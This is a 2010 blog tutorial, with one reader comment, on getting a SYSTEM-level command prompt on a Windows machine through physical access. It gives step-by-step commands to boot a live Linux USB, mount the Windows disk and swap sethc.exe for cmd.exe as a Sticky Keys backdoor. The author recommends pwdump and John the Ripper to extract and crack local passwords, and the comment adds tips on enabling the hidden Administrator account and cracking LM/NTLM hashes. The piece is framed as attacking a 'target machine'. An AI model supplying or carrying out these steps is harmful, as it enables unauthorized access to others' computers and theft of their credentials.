Owning Windows With Physical Access

============================
Owning Windows with physical access
============================

by Jakash3
04 October 2010

In this tutorial I will show you how to gain root access to command
prompt with physical access to the machine. Before you blindly start
doing all these instructions I tell you, I’m going to explain how
we’re going to do this. We are going to boot from a Linux on a
Windows machine and directly write to the windows hard disk to
replace sethc.exe with cmd.exe so that when you press Shift 5 times
before logging in; instead of the Sticky Keys dialog showing up, you
will have a SYSTEM access Command Prompt.

First what you need to do is get a copy of a live linux distro
installed on a USB. I suggest using UNetbootin. This tool can
automatically download and install a selected linux distribution to a
USB or Harddisk. For me, I would pick the latest live version of
Ubuntu and install it to my USB.

After that has completed. Just insert that to your target machine
before boot-up and once you boot-up, you want to enter into the boot
menu. This is usually done by pressing F12 continually until the menu
appears. Select to boot from your USB, and after that select the
Defualt boot for the UNetbootin boot manager.

Now we’re going to do these operations from the command shell so open
up Terminal (should be accessible from the Applications menu) and enter
in the following commands:

cd /dev/disks/by-uuid

Now in this folder, there should be a bunch of files that
link to attached devices such as another USB or Harddisk. Find the
device that’s the uuid of the local disk containing Windows that the
machine normally boots up from and Change Directory (cd) to that
device.

If you don’t know which one it is, you’re going to have to mount and
unmount each of them and look at their files to find out if it is the
disk containing Windows.

Before we mount, let’s make a directory for where we are going to
have our disk mounted, run:

mkdir /media/windows

To mount a disk. Just take the uuid of the hard drive containing
Windows and enter in:

sudo mount -t ntfs /media/windows UUID

(sudo means run this command as a superuser or root)
Where UUID is the UUID of the device. Once that’s done, just
change directory to /media/windows and use the following commands to
replace sethc.exe with cmd.exe:

# Go to system32
cd WINDOWS/system32
# Make backup of sethc.exe (rename to .bak)
mv sethc.exe sethc.exe.bak
# Make copy of cmd.exe as sethc.exe
cp cmd.exe sethc.exe

To unmount the device, run these:

cd /
sudo umount /media/windows

If you get a “device is busy” error, make sure no other programs
have this folder or any files in this folder open and also make sure
that you are not in this directory when you run this command (which
is why we used ‘cd /’).

Congradulations! If you got no errors and all goes well, you can
reboot back into Windows and before loggin in, just press Shift 5
times and you’ll get a full access command prompt. This cmd has the
same access rights as the built-in SYSTEM account which means you can
run any command on it. You can even invoke regedit or explorer with
full access.

For a tip, try putting pwdump and john the ripper on a USB and run
those through your root command prompt to extract local passwords
from the computer.

One thought on “Owning Windows With Physical Access

  1. Unfortunately, not all the commands are executable from the login screen. It’s Way better to enable the Administrator user sleeping in all windows systems (which is, in fact a super admin). On vista and newer os, anyway, portion of system such System32 are owned by TrustedInstaller, which is NOT an user of the machine and cannot be emulated.
    If you’re lucky, with pwdump you’ll have the LM Hash to decrypt, else the NTLM. There are sites that, given the hash, try to get the password for you, and more important, for free. Anyway, the best combination is both LM and NTLM.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: